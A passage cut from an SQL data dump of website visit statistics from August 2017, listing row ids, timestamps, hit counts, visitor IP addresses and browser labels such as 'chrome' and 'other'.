0,0,'141.8.183.1','other'),(143920,1502393103,1,1,0,0,'204.79.180.16','msie'),(143921,1502393373,3,3,0,0,'216.244.66.194','other'),(143922,1502393639,1,1,0,0,'141.8.183.1','other'),(143923,1502393888,1,1,0,0,'217.182.132.52','other'),(143924,1502393973,2,2,0,0,'213.180.203.32','other'),(143925,1502394699,1,1,0,0,'217.182.132.170','other'),(143926,1502395049,1,1,0,0,'207.46.13.140','other'),(143927,1502395057,2,2,0,0,'91.209.11.236','other'),(143928,1502395864,1,1,0,0,'95.108.181.63','other'),(143929,1502395977,1,1,0,0,'217.69.133.9','other'),(143930,1502396145,1,1,0,0,'109.86.6.177','chrome'),(143931,1502396522,1,1,0,0,'66.102.9.40','chrome'),(143932,1502396742,1,1,0,0,'157.55.39.153','other'),(143933,1502397273,1,1,0,0,'217.182.132.24','other'),(143934,1502397293,1,1,0,0,'51.255.65.93','other'),(143935,1502397427,1,1,0,0,'91.209.11.236','other'),(143936,1502397479,1,1,0,0,'217.182.132.92','other'),(143937,1502397571,1,0,1,0,'68.180.229.59',''),(143938,1502397660,3,3,0,0,'82.193.99.143','chrome'),(143939,1502397667,1,1,0,0,'66.220.152.186','other'),(143940,1502397973,2,2,0,0,'217.182.132.69','other'),(143941,1502398762,1,1,0,0,'216.244.66.194','other'),(143942,1502399063,1,1,0,0,'138.197.176.194','other'),(143943,1502399211,2,2,0,0,'91.209.11.236','other'),(143944,1502399827,3,0,3,0,'66.249.66.74',''),(143945,1502400165,1,1,0,0,'95.108.181.63','other'),(143946,1502400514,1,1,0,0,'141.8.183.1','other'),(143947,1502401051,1,1,0,0,'51.255.65.31','other'),(143948,1502401117,1,1,0,0,'8.29.198.27','other'),(143949,1502401121,1,1,0,0,'217.182.132.174','other'),(143950,1502401226,1,1,0,0,'51.255.65.48','other'),(143951,1502401513,1,1,0,0,'217.182.132.82','other'),(143952,1502401541,1,1,0,0,'213.180.203.32','other'),(143953,1502401548,1,1,0,0,'95.108.181.69','other'),(143954,1502401900,1,1,0,0,'51.255.65.33','other'),(143955,1502402111,1,1,0,0,'164.132.162.156','other'),(143956,1502402793,1,1,0,0,'46.119.4.229','chrome'),(143957,1502403028,1,1,0,0,'95.108.181.69','other'),(143958,1502403149,1,1,0,0,'217.182.132.28','other'),(143959,1502403236,1,1,0,0,'91.209.11.236','other'),(143960,1502403310,1,1,0,0,'51.255.71.100','other'),(143961,1502403399,1,1,0,0,'141.8.142.21','other'),(143962,1502403999,1,1,0,0,'217.182.132.70','other'),(143963,1502404536,1,1,0,0,'51.255.71.126','other'),(143964,1502404547,1,1,0,0,'213.180.203.32','other'),(143965,1502404717,1,1,0,0,'66.249.66.155','chrome'),(143966,1502404956,1,1,0,0,'141.8.142.21','other'),(143967,1502405760,1,1,0,0,'217.182.132.62','other'),(143968,1502406091,1,1,0,0,'141.8.142.107','other'),(143969,1502406629,1,1,0,0,'66.249.66.155','chrome'),(143970,1502406714,1,1,0,0,'51.255.65.67','other'),(143971,1502406799,4,4,0,0,'216.244.66.194','other'),(143972,1502407106,1,0,1,0,'66.249.66.76',''),(143973,1502407123,1,1,0,0,'217.182.132.241','other'),(143974,1502407171,1,0,1,0,'66.249.66.74',''),(143975,1502407237,1,1,0,0,'178.154.200.7','other'),(143976,1502407238,1,0,1,0,'66.249.66.75',''),(143977,1502407484,1,1,0,0,'217.69.133.194','other'),(143978,1502407493,1,1,0,0,'217.69.133.3','other'),(143979,1502407533,1,1,0,0,'91.209.11.236','other'),(143980,1502407551,1,1,0,0,'217.182.132.7','other'),(143981,1502407555,1,1,0,0,'141.8.142.21','other'),(143982,1502408167,1,1,0,0,'37.9.113.163','other'),(143983,1502408435,1,1,0,0,'217.182.132.172','other'),(143984,1502408988,1,1,0,0,'164.132.162.164','other'),(143985,1502409314,1,1,0,0,'141.8.142.107','other'),(143986,1502409406,1,1,0,0,'178.154.200.7','other'),(143987,1502409792,1,1,0,0,'51.255.71.133','other'),(143988,1502410357,1,1,0,0,'141.8.183.1','other'),(143989,1502410691,1,1,0,0,'217.182.132.149','other'),(143990,1502411038,1,1,0,0,'46.241.7.137','msie'),(143991,1502411453,1,1,0,0,'180.76.15.22','other'),(143992,1502411464,1,1,0,0,'217.69.133.6','other'),(143993,1502411503,1,1,0,0,'157.55.39.153','other'),(143994,1502411582,1,1,0,0,'217.69.133.4','other'),(143995,1502411945,1,1,0,0,'8.29.198.25','other'),(143996,1502412384,2,2,0,0,'217.69.133.2','other'),(143997,1502412717,2,2,0,0,'95.108.181.69','other'),(143998,1502412739,1,1,0,0,'217.182.132.24','other'),(143999,1502412957,1,1,0,0,'213.180.203.32','other'),(144000,1502413027,1,1,0,0,'178.154.200.27','other'),(144001,1502413044,1,1,0,0,'217.69.133.3','other'),(144002,1502413251,1,1,0,0,'51.255.65.48','other'),(144003,1502413576,1,1,0,0,'207.46.13.140','other'),(144004,1502413903,1,1,0,0,'51.255.71.113','other'),(144005,1502413992,1,1,0,0,'109.63.214.28','chrome'),(144006,1502414136,4,4,0,0,'216.244.66.194','other'),(144007,1502414206,1,0,1,0,'66.249.66.74',''),(144008,1502414239,1,0,1,0,'66.249.66.75',''),(144009,1502414316,1,0,1,0,'66.249.66.76',''),(144010,1502414878,1,1,0,0,'217.182.132.56','other'),(144011,1502415146,4,4,0,0,'216.244.66.194','other'),(144012,1502415207,1,1,0,0,'51.255.65.41','other'),(144013,1502416742,1,1,0,0,'51.255.65.43','other'),(144014,1502416956,1,1,0,0,'37.9.113.94','other'),(144015,1502417594,6,6,0,0,'151.80.46.90','other'),(144016,1502418071,1,1,0,0,'217.69.133.2','other'),(144017,1502418110,1,1,0,0,'217.69.133.4','other'),(144018,1502418536,1,1,0,0,'217.69.133.203','other'),(144019,1502418884,1,1,0,0,'157.55.39.205','other'),(144020,1502419256,1,1,0,0,'217.182.132.187','other'),(144021,1502419351,1,1,0,0,'217.182.132.78','other'),(144022,1502419663,1,1,0,0,'157.55.39.153','other'),(144023,1502419972,1,1,0,0,'51.255.65.81','other'),(144024,1502420098,1,1,0,0,'51.255.65.224','other'),(144025,1502420244,1,1,0,0,'217.182.132.96','other'),(144026,1502420292,1,1,0,0,'35.184.189.105','other'),(144027,1502420469,1,1,0,0,'95.108.181.63','other'),(144028,1502420733,1,1,0,0,'213.180.203.32','other'),(144029,1502420867,3,1,2,0,'66.249.66.74',''),(144030,1502420960,1,1,0,0,'204.79.180.6','msie'),(144031,1502421108,1,1,0,0,'217.182.132.171','other'),(144032,1502421596,1,1,0,0,'217.182.132.154','other'),(144033,1502421667,1,1,0,0,'217.182.132.155','other'),(144034,1502421686,1,0,1,0,'66.249.66.76',''),(144035,1502422176,1,1,0,0,'91.209.11.236','other'),(144036,1502422187,1,1,0,0,'141.8.183.1','other'),(144037,1502422292,1,1,0,0,'51.255.71.123','other'),(144038,1502422421,1,1,0,0,'51.255.65.47','other'),(144039,1502422697,1,1,0,0,'51.255.65.51','other'),(144040,1502422773,1,1,0,0,'8.29.198.26','other'),(144041,1502423498,2,0,2,0,'66.249.66.155',''),(144042,1502423566,5,5,0,0,'216.244.66.194','other'),(144043,1502423582,1,0,1,0,'66.249.66.157',''),(144044,1502423623,1,0,1,0,'66.249.66.156',''),(144045,1502423813,1,1,0,0,'91.196.178.71','chrome'),(144046,1502423855,1,1,0,0,'95.108.181.63','other'),(144047,1502424107,1,1,0,0,'217.69.133.203','other'),(144048,1502425096,1,1,0,0,'141.8.142.21','other'),(144049,1502425376,1,1,0,0,'51.255.65.16','other'),(144050,1502425404,1,1,0,0,'51.255.65.41','other'),(144051,1502425594,1,1,0,0,'180.76.15.21','other'),(144052,1502425926,1,1,0,0,'207.46.13.140','other'),(144053,1502426082,1,1,0,0,'178.154.200.7','other'),(144054,1502426320,5,5,0,0,'216.244.66.194','other'),(144055,1502426724,1,1,0,0,'51.255.65.40','other'),(144056,1502427200,1,0,1,0,'66.249.66.75',''),(144057,1502427473,1,1,0,0,'5.255.253.29','other'),(144058,1502427513,1,1,0,0,'217.182.132.19','other'),(144059,1502427590,1,1,0,0,'66.249.66.156','chrome'),(144060,1502427856,1,1,0,0,'91.209.11.236','other'),(144061,1502428476,1,1,0,0,'91.196.178.71','firefox'),(144062,1502429169,1,1,0,0,'217.69.133.5','other'),(144063,1502429205,1,0,1,0,'66.249.66.76',''),(144064,1502429218,1,0,1,0,'66.249.66.74',''),(144065,1502429320,1,1,0,0,'213.180.203.32','other'),(144066,1502429324,1,0,1,0,'66.249.66.75',''),(144067,1502429595,1,1,0,0,'217.69.133.194','other'),(144068,1502429733,1,1,0,0,'141.8.142.21','other'),(144069,1502429769,1,1,0,0,'91.209.11.236','other'),(144071,1502430226,1,1,0,0,'217.182.132.179','other'),(144072,1502430623,1,1,0,0,'217.182.132.150','other'),(144073,1502430779,2,2,0,0,'91.209.11.236','other'),(144074,1502431062,1,1,0,0,'91.196.178.71','firefox'),(144075,1502431101,1,1,0,0,'141.8.183.1','other'),(144076,1502431108,1,1,0,0,'91.196.178.71','chrome'),(144077,1502431461,1,1,0,0,'91.196.178.164','chrome'),(144078,1502431713,1,1,0,0,'31.43.156.8','other'),(144079,1502431750,1,1,0,0,'37.9.113.163','other'),(144080,1502431998,1,1,0,0,'95.135.241.151','chrome'),(144081,1502432019,1,1,0,0,'37.73.112.73','chrome'),(144082,1502432055,1,1,0,0,'37.73.234.0','chrome'),(144083,1502432058,1,1,0,0,'217.182.132.86','other'),(144084,1502432074,1,1,0,0,'91.196.178.69','firefox'),(144085,1502432097,2,2,0,0,'37.53.144.83','chrome'),(144086,1502432143,2,2,0,0,'91.196.178.69','chrome'),(144087,1502432172,1,1,0,0,'91.196.178.71','chrome'),(144088,1502432206,1,1,0,0,'91.196.178.70','chrome'),(144089,1502432262,1,1,0,0,'193.106.59.83','other'),(144090,1502432506,1,1,0,0,'217.182.132.18','other'),(144091,1502432683,1,1,0,0,'37.9.113.94','other'),(144092,1502432686,1,0,1,0,'66.249.66.157',''),(144093,1502432754,1,1,0,0,'46.133.237.251','chrome'),(144094,1502432770,1,1,0,0,'94.45.50.70','chrome'),(144095,1502432849,1,1,0,0,'91.196.177.46','chrome'),(144096,1502433003,1,1,0,0,'107.167.116.75','other'),(144097,1502433033,1,1,0,0,'95.132.11.55','firefox'),(144098,1502433142,1,1,0,0,'217.182.132.63','other'),(144099,1502433229,1,1,0,0,'94.178.7.233','chrome'),(144100,1502433301,1,1,0,0,'95.108.181.69','other'),(144101,1502433407,1,1,0,0,'95.132.46.93','chrome'),(144102,1502433432,1,1,0,0,'46.133.104.227','chrome'),(144103,1502433563,1,1,0,0,'77.125.111.237','chrome'),(144104,1502433580,1,1,0,0,'107.167.107.79','other'),(144105,1502433606,1,1,0,0,'8.29.198.27','other'),(144106,1502433608,1,1,0,0,'37.73.200.208','chrome'),(144107,1502433636,1,1,0,0,'91.196.178.100','chrome'),(144108,1502433638,1,1,0,0,'46.101.5.216','chrome'),(144109,1502433681,1,1,0,0,'91.196.178.71','chrome'),(144110,1502433788,1,1,0,0,'185.120.133.231','chrome'),(144111,1502433824,1,1,0,0,'37.54.21.41','firefox'),(144112,1502433921,1,1,0,0,'91.196.178.40','chrome'),(144113,1502433945,1,1,0,0,'92.112.225.121','chrome'),(144114,1502434010,1,1,0,0,'37.73.249.175','chrome'),(144115,1502434018,1,1,0,0,'91.124.119.49','chrome'),(144116,1502434027,1,1,0,0,'51.255.71.100','other'),(144117,1502434154,1,1,0,0,'5.45.207.64','other'),(144118,1502434155,1,1,0,0,'195.10.210.49','chrome'),(144119,1502434413,9,9,0,0,'216.244.66.194','other'),(144120,1502434427,1,1,0,0,'91.196.178.130','chrome'),(144121,1502434437,1,1,0,0,'91.196.177.17','chrome'),(144122,1502434448,1,1,0,0,'66.102.9.25','chrome'),(144123,1502434495,1,1,0,0,'91.196.178.103','chrome'),(144124,1502434594,2,2,0,0,'217.69.133.5','other'),(144125,1502434727,1,1,0,0,'217.182.132.62','other'),(144126,1502434805,1,1,0,0,'51.255.65.85','other'),(144127,1502434834,1,1,0,0,'95.135.10.245','chrome'),(144128,1502434837,1,0,1,0,'68.180.229.59',''),(144129,1502434847,1,1,0,0,'95.135.88.75','chrome'),(144130,1502435083,1,1,0,0,'217.182.132.78','other'),(144131,1502435138,1,1,0,0,'91.196.178.72','chrome'),(144132,1502435480,1,1,0,0,'46.211.122.105','chrome'),(144133,1502435541,1,1,0,0,'87.250.224.150','other'),(144134,1502435736,96,96,0,0,'144.76.56.44','other'),(144135,1502435747,1,1,0,0,'91.196.178.131','chrome'),(144136,1502435796,1,1,0,0,'91.124.181.178','chrome'),(144137,1502435884,1,1,0,0,'51.255.65.91','other'),(144138,1502435943,4,1,3,0,'66.249.66.74',''),(144139,1502435985,1,1,0,0,'217.182.132.35','other'),(144140,1502436118,1,1,0,0,'95.132.11.55','firefox'),(144141,1502436370,1,1,0,0,'37.73.196.229','chrome'),(144142,1502436459,1,1,0,0,'217.182.132.31','other'),(144143,1502436502,1,1,0,0,'91.196.178.69','chrome'),(144144,1502436505,1,1,0,0,'95.132.21.109','chrome'),(144145,1502436587,1,1,0,0,'141.170.226.226','chrome'),(144146,1502436599,1,1,0,0,'217.182.132.185','other'),(144147,1502436670,1,1,0,0,'217.182.132.80','other'),(144148,1502436686,1,1,0,0,'37.53.15.123','chrome'),(144149,1502436723,1,1,0,0,'82.145.223.69','chrome'),(144150,1502436734,1,1,0,0,'51.255.65.16','other'),(144151,1502437002,1,1,0,0,'217.182.132.52','other'),(144152,1502437058,1,1,0,0,'157.55.39.153','other'),(144153,1502437174,1,1,0,0,'137.74.207.114','other'),(144154,1502437422,1,1,0,0,'37.9.113.163','other'),(144155,1502437445,2,2,0,0,'94.178.146.88','chrome'),(144156,1502437487,1,1,0,0,'51.255.71.129','other'),(144157,1502437601,2,2,0,0,'91.196.177.151','chrome'),(144158,1502437654,1,1,0,0,'46.211.113.85','chrome'),(144159,1502437926,1,1,0,0,'91.196.178.66','firefox'),(144160,1502438044,1,0,1,0,'66.249.66.156',''),(144161,1502438100,1,1,0,0,'46.200.116.59','chrome'),(144162,1502438108,1,1,0,0,'51.255.65.4','other'),(144163,1502438673,1,1,0,0,'157.55.39.153','other'),(144164,1502438808,1,1,0,0,'217.182.132.179','other'),(144165,1502439003,1,1,0,0,'66.220.151.212','other'),(144166,1502439294,1,1,0,0,'137.74.207.116','other'),(144167,1502439317,1,1,0,0,'164.132.162.155','other'),(144168,1502439350,1,1,0,0,'164.132.162.153','other'),(144169,1502439453,1,1,0,0,'91.196.178.66','firefox'),(144170,1502439576,1,1,0,0,'46.133.254.166','chrome'),(144171,1502439735,1,1,0,0,'51.255.65.23','other'),(144172,1502439907,1,1,0,0,'66.249.66.156','chrome'),(144173,1502440012,2,2,0,0,'5.45.207.64','other'),(144174,1502440103,1,1,0,0,'164.132.162.154','other'),(144175,1502440185,1,1,0,0,'91.196.178.66','chrome'),(144176,1502440242,1,1,0,0,'51.255.71.100','other'),(144177,1502440281,1,1,0,0,'91.209.11.236','other'),(144178,1502440556,1,1,0,0,'37.53.122.146','chrome'),(144179,1502440717,1,1,0,0,'217.69.133.4','other'),(144180,1502440810,1,1,0,0,'217.182.132.171','other'),(144181,1502440982,1,1,0,0,'37.9.113.138','other'),(144182,1502441031,1,1,0,0,'176.36.19.186','chrome'),(144183,1502441507,1,1,0,0,'93.72.75.73','chrome'),(144184,1502441536,1,1,0,0,'93.74.112.240','chrome'),(144185,1502441564,2,2,0,0,'37.53.228.39','chrome'),(144186,1502441581,1,1,0,0,'51.255.71.101','other'),(144187,1502441717,1,1,0,0,'91.196.178.165','chrome'),(144188,1502441724,1,1,0,0,'46.119.4.229','chrome'),(144189,1502441905,1,1,0,0,'128.199.42.73','chrome'),(144190,1502442090,1,1,0,0,'94.179.42.221','chrome'),(144191,1502442199,3,3,0,0,'217.230.212.95','chrome'),(144192,1502442207,1,1,0,0,'51.255.65.28','other'),(144193,1502442229,1,1,0,0,'217.182.132.66','other'),(144194,1502442382,1,1,0,0,'51.255.71.120','other'),(144195,1502442616,1,1,0,0,'91.196.178.72','chrome'),(144196,1502442714,1,1,0,0,'130.180.216.44','chrome'),(144197,1502442803,1,1,0,0,'217.182.132.34','other'),(144198,1502442947,2,0,2,0,'66.249.66.76',''),(144199,1502442982,1,1,0,0,'66.249.66.155','chrome'),(144200,1502443009,1,0,1,0,'66.249.66.75',''),(144201,1502443070,1,1,0,0,'217.182.132.82','other'),(144202,1502443223,1,1,0,0,'46.211.6.104','chrome'),(144203,1502443230,1,1,0,0,'51.255.65.75','other'),(144204,1502443268,1,1,0,0,'217.182.132.150','other'),(144205,1502443341,1,1,0,0,'173.91.35.170','other'),(144206,1502443412,1,1,0,0,'37.73.211.9','chrome'),(144207,1502443540,1,1,0,0,'137.74.207.116','other'),(144208,1502443637,1,1,0,0,'46.211.97.233','chrome'),(144209,1502443811,1,1,0,0,'217.182.132.241','other'),(144210,1502443871,1,1,0,0,'51.255.65.55','other'),(144211,1502443943,1,1,0,0,'185.182.81.83','chrome'),(144212,1502443973,2,2,0,0,'37.73.226.132','chrome'),(144213,1502444046,1,1,0,0,'178.95.67.90','chrome'),(144214,1502444068,1,1,0,0,'95.158.49.76','chrome'),(144215,1502444245,1,1,0,0,'91.196.178.134','chrome'),(144216,1502444429,1,1,0,0,'37.142.170.120','other'),(144217,1502444432,1,1,0,0,'8.29.198.26','other'),(144218,1502444540,1,1,0,0,'173.91.35.170','other'),(144219,1502444546,1,1,0,0,'37.73.208.0','chrome'),(144220,1502444623,1,1,0,0,'217.182.132.72','other'),(144221,1502444685,1,1,0,0,'51.255.65.27','other'),(144222,1502444950,1,1,0,0,'46.211.103.144','chrome'),(144223,1502445099,1,1,0,0,'95.108.181.69','other'),(144224,1502445480,1,1,0,0,'51.255.65.7','other'),(144225,1502445536,1,1,0,0,'37.53.226.105','chrome'),(144226,1502445588,1,1,0,0,'51.255.65.46','other'),(144227,1502445621,1,1,0,0,'188.226.154.228','chrome'),(144228,1502445708,2,2,0,0,'217.69.133.5','other'),(144229,1502445711,1,1,0,0,'157.55.39.205','other'),(144230,1502445728,1,1,0,0,'207.46.13.140','other'),(144231,1502445760,1,1,0,0,'217.69.133.3','other'),(144232,1502445842,1,1,0,0,'91.196.178.165','chrome'),(144233,1502446023,1,1,0,0,'37.55.227.110','chrome'),(144234,1502446069,1,1,0,0,'217.182.132.23','other'),(144235,1502446188,1,1,0,0,'178.95.67.90','chrome'),(144236,1502446256,1,1,0,0,'51.255.65.77','other'),(144237,1502446281,1,1,0,0,'37.73.213.151','other'),(144238,1502446379,1,1,0,0,'91.196.178.133','chrome'),(144239,1502446565,1,1,0,0,'217.182.132.92','other'),(144240,1502446740,1,1,0,0,'217.182.132.81','other'),(144241,1502446840,1,1,0,0,'178.154.200.7','other'),(144242,1502446993,1,1,0,0,'46.211.103.72','chrome'),(144243,1502447545,1,1,0,0,'24.209.49.165','chrome'),(144244,1502447580,1,1,0,0,'91.196.178.131','other'),(144245,1502447922,1,1,0,0,'37.215.55.3','chrome'),(144246,1502447943,1,1,0,0,'51.255.65.42','other'),(144247,1502447976,1,1,0,0,'51.255.65.30','other'),(144248,1502448183,1,1,0,0,'51.255.65.47','other'),(144249,1502448238,1,1,0,0,'91.209.11.236','other'),(144250,1502448316,1,1,0,0,'95.108.181.63','other'),(144251,1502448575,1,1,0,0,'37.73.217.7','chrome'),(144252,1502448579,1,1,0,0,'178.154.200.27','other'),(144253,1502448581,1,1,0,0,'51.255.65.24','other'),(144254,1502448589,1,1,0,0,'141.8.142.107','other'),(144255,1502448688,1,1,0,0,'37.53.224.147','chrome'),(144256,1502448720,1,1,0,0,'51.255.65.41','other'),(144257,1502448779,1,1,0,0,'91.196.178.167','chrome'),(144258,1502448829,1,1,0,0,'91.196.178.39','chrome'),(144259,1502448858,1,1,0,0,'213.5.192.171','chrome'),(144260,1502448968,1,1,0,0,'51.255.65.34','other'),(144261,1502449067,1,1,0,0,'217.182.132.74','other'),(144262,1502449277,1,1,0,0,'95.133.150.137','chrome'),(144263,1502449433,1,1,0,0,'91.196.178.34','chrome'),(144264,1502449495,1,1,0,0,'217.182.132.186','other'),(144265,1502449707,1,1,0,0,'217.182.132.72','other'),(144266,1502449853,1,1,0,0,'46.101.57.106','chrome'),(144267,1502450093,1,1,0,0,'91.196.178.166','chrome'),(144268,1502450105,1,1,0,0,'5.45.207.64','other'),(144269,1502450146,1,1,0,0,'91.196.178.66','chrome'),(144270,1502450155,1,1,0,0,'51.255.65.39','other'),(144271,1502450215,2,2,0,0,'37.73.200.2','chrome'),(144272,1502450242,1,1,0,0,'217.69.133.3','other'),(144273,1502450482,1,0,1,0,'66.249.66.75',''),(144274,1502450615,1,1,0,0,'91.240.97.115','chrome'),(144275,1502450654,1,1,0,0,'91.196.178.135','chrome'),(144276,1502450884,1,1,0,0,'91.196.178.133','chrome'),(144277,1502450997,1,1,0,0,'46.211.114.250','chrome'),(144278,1502451165,1,1,0,0,'141.8.142.21','other'),(144279,1502451397,1,1,0,0,'141.8.183.1','other'),(144280,1502451522,1,1,0,0,'46.201.175.91','firefox'),(144281,1502451572,1,1,0,0,'66.249.66.157','chrome'),(144282,1502451608,1,1,0,0,'176.96.194.243','chrome'),(144283,1502451661,1,1,0,0,'51.255.65.79','other'),(144284,1502451781,1,1,0,0,'217.69.133.9','other'),(144285,1502452196,1,1,0,0,'91.196.178.40','chrome'),(144286,1502452223,8,8,0,0,'173.91.35.170','other'),(144287,1502452268,1,1,0,0,'51.255.65.37','other'),(144288,1502452378,1,1,0,0,'141.8.183.5','other'),(144289,1502452418,1,1,0,0,'216.244.66.194','other'),(144290,1502452437,1,1,0,0,'91.196.178.71','chrome'),(144291,1502452505,1,1,0,0,'5.58.18.247','chrome'),(144292,1502452657,1,1,0,0,'130.180.220.41','chrome'),(144293,1502452775,1,1,0,0,'31.172.81.32','other'),(144294,1502452778,1,1,0,0,'51.255.65.67','other'),(144295,1502452819,1,1,0,0,'91.232.158.20','chrome'),(144296,1502452848,1,1,0,0,'217.182.132.180','other'),(144297,1502452985,1,1,0,0,'217.182.132.183','other'),(144298,1502452999,1,1,0,0,'51.255.65.12','other'),(144299,1502453002,1,1,0,0,'217.182.132.68','other'),(144300,1502453031,1,1,0,0,'91.196.178.132','chrome'),(144301,1502453120,1,1,0,0,'212.1.126.82','chrome'),(144302,1502453148,2,2,0,0,'31.134.121.128','chrome'),(144303,1502453150,3,3,0,0,'173.91.35.170','other'),(144304,1502453157,1,1,0,0,'37.53.123.180','chrome'),(144305,1502453724,1,1,0,0,'163.172.251.217','chrome'),(144306,1502454214,1,1,0,0,'91.196.178.130','chrome'),(144307,1502454289,1,1,0,0,'51.255.65.69','other'),(144308,1502454440,1,1,0,0,'37.73.237.49','chrome'),(144309,1502454485,1,1,0,0,'217.182.132.18','other'),(144310,1502454672,1,1,0,0,'217.182.132.59','other'),(144311,1502454750,1,1,0,0,'46.119.4.229','chrome'),(144312,1502454880,1,1,0,0,'217.182.132.187','other'),(144313,1502454881,1,1,0,0,'151.36.14.19','chrome'),(144314,1502454971,1,1,0,0,'51.255.71.126','other'),(144315,1502454996,2,2,0,0,'91.209.11.236','other'),(144316,1502455041,1,1,0,0,'92.60.189.133','chrome'),(144317,1502455105,1,1,0,0,'91.196.178.101','chrome'),(144318,1502455270,1,1,0,0,'8.29.198.27','other'),(144319,1502455382,1,0,1,0,'66.249.66.157',''),(144320,1502455938,1,1,0,0,'77.222.148.36','chrome'),(144321,1502456009,1,1,0,0,'141.8.142.107','other'),(144322,1502456748,1,1,0,0,'217.182.132.149','other'),(144323,1502456859,1,1,0,0,'217.69.133.2','other'),(144324,1502457101,1,1,0,0,'51.255.65.18','other'),(144325,1502457191,1,1,0,0,'91.209.11.236','other'),(144326,1502457259,1,1,0,0,'217.69.133.3','other'),(144327,1502457369,1,1,0,0,'164.132.162.154','other'),(144328,1502457562,1,1,0,0,'164.132.162.164','other'),(144329,1502457885,1,1,0,0,'66.249.66.155','chrome'),(144330,1502457990,1,1,0,0,'46.211.121.235','chrome'),(144331,1502457993,1,1,0,0,'91.196.176.13','chrome'),(144332,1502458034,1,1,0,0,'217.182.132.91','other'),(144333,1502458181,1,1,0,0,'107.178.195.220','msie'),(144334,1502458183,1,1,0,0,'204.13.201.137','msie'),(144335,1502458191,1,1,0,0,'178.17.174.10','msie'),(144336,1502458222,1,1,0,0,'2.53.170.103','chrome'),(144337,1502458374,1,1,0,0,'2.53.17.93','chrome'),(144338,1502458409,1,1,0,0,'95.132.3.16','chrome'),(144339,1502458410,2,2,0,0,'95.215.94.94','chrome'),(144340,1502458740,1,0,1,0,'66.249.66.74',''),(144341,1502458759,1,1,0,0,'51.179.100.145','chrome'),(144342,1502458833,1,0,1,0,'66.249.66.75',''),(144343,1502458877,1,1,0,0,'51.255.65.65','other'),(144344,1502459102,1,1,0,0,'198.200.97.104','firefox'),(144345,1502459910,1,1,0,0,'141.8.142.107','other'),(144346,1502460202,1,1,0,0,'137.74.207.170','other'),(144347,1502460211,1,1,0,0,'51.255.65.27','other'),(144348,1502460220,1,1,0,0,'37.73.241.103','chrome'),(144349,1502460599,1,1,0,0,'37.115.137.13','chrome'),(144350,1502460727,1,1,0,0,'157.55.39.205','other'),(144351,1502460839,1,1,0,0,'95.132.55.130','firefox'),(144352,1502461169,2,2,0,0,'217.69.133.6','other'),(144353,1502461465,1,1,0,0,'217.182.132.177','other'),(144354,1502461484,1,1,0,0,'94.179.246.85','chrome'),(144355,1502461552,1,1,0,0,'37.54.16.139','chrome'),(144356,1502461603,1,1,0,0,'37.53.123.180','chrome'),(144357,1502461624,1,1,0,0,'164.132.162.153','other'),(144358,1502461813,1,1,0,0,'51.255.65.87','other'),(144359,1502461975,1,1,0,0,'217.182.132.193','other'),(144360,1502462050,1,1,0,0,'141.8.183.1','other'),(144361,1502462084,1,1,0,0,'51.255.65.69','other'),(144362,1502462428,2,2,0,0,'91.209.11.236','other'),(144363,1502462484,1,1,0,0,'95.108.181.63','other'),(144364,1502462661,1,1,0,0,'62.244.38.59','chrome'),(144365,1502462785,1,1,0,0,'91.214.84.210','chrome'),(144366,1502463086,1,1,0,0,'51.255.71.98','other'),(144367,1502463158,1,1,0,0,'51.255.65.48','other'),(144368,1502463223,1,1,0,0,'37.188.249.144','chrome'),(144369,1502463509,1,1,0,0,'51.255.65.11','other'),(144370,1502463635,1,1,0,0,'51.255.65.89','other'),(144371,1502463843,1,1,0,0,'51.255.65.72','other'),(144372,1502464294,1,1,0,0,'91.209.11.236','other'),(144373,1502464346,1,1,0,0,'46.211.100.230','chrome'),(144374,1502464718,1,1,0,0,'164.132.164.180','other'),(144375,1502464739,1,1,0,0,'51.255.65.78','other'),(144376,1502464828,1,1,0,0,'217.182.132.58','other'),(144377,1502465283,1,1,0,0,'217.182.132.94','other'),(144378,1502465361,1,1,0,0,'94.179.208.97','chrome'),(144379,1502465394,1,1,0,0,'217.182.132.30','other'),(144380,1502465415,1,1,0,0,'217.182.132.155','other'),(144381,1502465706,1,1,0,0,'91.209.11.236','other'),(144382,1502465865,1,1,0,0,'217.182.132.177','other'),(144383,1502465897,1,1,0,0,'213.180.203.32','other'),(144384,1502466092,1,1,0,0,'217.182.132.191','other'),(144385,1502466101,1,1,0,0,'8.29.198.26','other'),(144386,1502466404,1,1,0,0,'91.196.178.134','chrome'),(144387,1502466623,1,1,0,0,'51.255.65.77','other'),(144388,1502466845,1,1,0,0,'95.108.181.63','other'),(144389,1502467150,1,1,0,0,'95.132.3.188','chrome'),(144390,1502467191,1,1,0,0,'217.182.132.192','other'),(144391,1502467274,1,1,0,0,'51.255.65.26','other'),(144392,1502467428,2,2,0,0,'85.65.177.223','chrome'),(144393,1502467440,1,1,0,0,'37.53.226.105','chrome'),(144394,1502467570,1,1,0,0,'176.37.106.51','other'),(144395,1502467695,1,1,0,0,'217.182.132.180','other'),(144396,1502468445,1,1,0,0,'157.55.39.205','other'),(144397,1502468447,1,1,0,0,'137.74.207.116','other'),(144398,1502468506,1,1,0,0,'109.224.80.19','chrome'),(144399,1502468517,1,1,0,0,'5.45.207.64','other'),(144400,1502468579,1,1,0,0,'37.73.167.69','chrome'),(144401,1502468608,1,1,0,0,'217.182.132.19','other'),(144402,1502468671,1,1,0,0,'37.73.235.16','other'),(144403,1502468768,1,1,0,0,'51.255.65.31','other'),(144404,1502469082,1,1,0,0,'217.182.132.184','other'),(144405,1502469369,1,1,0,0,'51.255.65.78','other'),(144406,1502469383,1,1,0,0,'51.255.71.121','other'),(144407,1502469425,1,1,0,0,'91.204.132.26','chrome'),(144408,1502469540,1,1,0,0,'51.255.65.80','other'),(144409,1502469972,1,0,1,0,'66.249.66.76',''),(144410,1502470024,1,1,0,0,'51.255.71.116','other'),(144411,1502470145,1,1,0,0,'212.90.60.232','chrome'),(144412,1502470297,1,1,0,0,'51.255.65.4','other'),(144413,1502470575,1,1,0,0,'37.73.199.24','chrome'),(144414,1502470583,1,1,0,0,'217.182.132.58','other'),(144415,1502470601,1,1,0,0,'217.182.132.97','other'),(144416,1502470960,1,1,0,0,'51.255.65.3','other'),(144417,1502471101,1,1,0,0,'91.209.11.236','other'),(144418,1502471311,1,1,0,0,'217.182.132.68','other'),(144419,1502471558,1,1,0,0,'5.45.207.64','other'),(144420,1502472026,1,1,0,0,'91.196.178.34','chrome'),(144421,1502472055,1,1,0,0,'51.255.65.54','other'),(144422,1502472161,1,1,0,0,'62.122.205.231','chrome'),(144423,1502472365,1,1,0,0,'188.120.132.179','chrome'),(144424,1502472372,1,1,0,0,'51.255.65.46','other'),(144425,1502472479,2,2,0,0,'91.209.11.236','other'),(144426,1502472529,1,1,0,0,'217.182.132.15','other'),(1